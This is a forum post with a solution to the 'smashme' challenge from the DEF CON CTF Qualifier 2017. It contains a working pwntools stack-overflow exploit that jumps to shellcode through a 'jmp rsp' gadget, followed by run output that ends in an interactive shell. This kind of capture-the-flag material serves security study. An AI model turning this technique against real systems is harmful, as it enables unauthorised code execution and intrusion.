
[DEF CON CTF Qualifier 2017] smashme

Posted: Mon May 01, 2017 8:17 pm
by amesianx


from pwn import *

# pwntools defaults for the target: 64-bit Linux, so asm() emits amd64 code and
# p64() packs 8-byte little-endian values.
context(arch='amd64', os='linux')

elf = ELF('./smashme')
# NOTE(review): `rop` is built but never used below; no gadget chain is taken from it.
rop = ROP(elf)

# Remote target is commented out; the script runs the binary locally instead.
#conn = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
conn = process(['./smashme'])
# Python 2 script (print statement, generator .next()); a Python 3 port would also
# need bytes literals, since p64()/asm() return bytes there and str + bytes fails.
print conn.recvuntil('Welcome to the Dr. Phil Show. Wanna smash?')
# Presumably the string the binary compares against (binary not shown here). The
# trailing NUL stops a C string comparison at this point while the bytes that follow
# still overrun the buffer -- inferred, confirm against the binary.
k = 'Smash me outside, how bout dAAAAAAAAAAA\0'
# pwntools dupsh template: dup2 fd 4 onto stdin/stdout, then spawn a shell.
# fd 4 is presumably the client connection of the original service -- TODO confirm.
shellcode = asm(shellcraft.dupsh(4))
# First `jmp rsp` gadget in the binary, packed as the new saved return address.
# Two properties from the checksec output make this viable: no PIE (the gadget
# address is fixed) and NX disabled (the stack is executable). Either mitigation
# would have broken this approach.
jmp_rsp = p64(elf.search(asm("jmp rsp")).next())
# Bytes that land under rsp right after the `ret`: nop; nop; jmp short +0x16.
# The short jump skips 22 bytes forward, into the NOP sled below.
jmp = "\x90\x90\xeb\x16"
nop = "\x90"*60
# Payload layout: 72 bytes of buffer fill (the string padded with 'A'), then the
# overwritten return address, the short jump, the sled and the shellcode. The 72 is
# the buffer-to-saved-return-address distance of the challenge binary; it is not
# derivable from this script. The overwrite goes undetected only because the binary
# has no stack canary (checksec output above).
conn.send(k.ljust(72, 'A') + jmp_rsp + jmp + nop + shellcode + '\n')
# Hand the connection to the user once the shell is up.
conn.interactive()


root@e2837c6b25fd ~/CTF/defcon
# python ex.py
[*] '/root/CTF/defcon/smashme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
[*] Loaded cached gadgets for './smashme'
[+] Starting local process './smashme': pid 9188
Welcome to the Dr. Phil Show. Wanna smash?

[*] Switching to interactive mode

$ ls -al
total 332324
drwxr-xr-x  9 1002 1002      4096 May  1 11:18 .
drwxr-xr-x 14 1002 1002      4096 Apr 29 14:52 ..
